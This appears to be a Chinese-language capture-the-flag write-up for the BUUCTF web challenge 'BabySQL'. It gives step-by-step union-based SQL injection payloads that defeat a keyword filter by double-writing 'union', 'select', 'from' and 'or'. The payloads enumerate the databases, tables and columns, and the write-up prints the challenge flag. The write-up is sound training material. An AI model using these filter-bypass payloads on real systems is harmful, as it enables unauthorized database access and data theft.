buuctf web [极客大挑战 2019]BabySQL

buuctf web [极客大挑战 2019]BabySQL

开始的页面
buuctf web [极客大挑战 2019]BabySQL_第1张图片
随便输入用户名和密码
buuctf web [极客大挑战 2019]BabySQL_第2张图片
sql注入,先判断有多少字段
buuctf web [极客大挑战 2019]BabySQL_第3张图片
从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误
buuctf web [极客大挑战 2019]BabySQL_第4张图片
3个字段,成功
?username=admin&password=123%27ununionion selselectect 1,2,3%20%23
buuctf web [极客大挑战 2019]BabySQL_第5张图片
爆库 ?username=admin&password=123%27ununionion selselectect 1,2,database()%20%23
当前数据库为geek
buuctf web [极客大挑战 2019]BabySQL_第6张图片
这里from,or,where都被过滤了,都要双写
查询所有数据库
?username=admin&password=123%27ununionion selselectect 1,2,group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
buuctf web [极客大挑战 2019]BabySQL_第7张图片
有个ctf的库,那就查它的表
?username=admin&password=123%27ununionion selselectect 1,2,group_concat(table_name)%20frfromom%20infoorrmation_schema.tables whewherere table_schema="ctf"%20%23
buuctf web [极客大挑战 2019]BabySQL_第8张图片
爆字段
?username=admin&password=123%27ununionion selselectect 1,2,group_concat(column_name)%20frfromom%20infoorrmation_schema.columns whewherere table_name="Flag"%20%23
buuctf web [极客大挑战 2019]BabySQL_第9张图片
爆值
?username=admin&password=123%27ununionion selselectect 1,2,flag frfromom ctf.Flag%20%23
因为当前库不是ctf库,所以要指明ctf.Flag
buuctf web [极客大挑战 2019]BabySQL_第10张图片
flag{48018c0b-11c4-42de-8506-ac6a9ef6eac3}

你可能感兴趣的:(buuctf,web)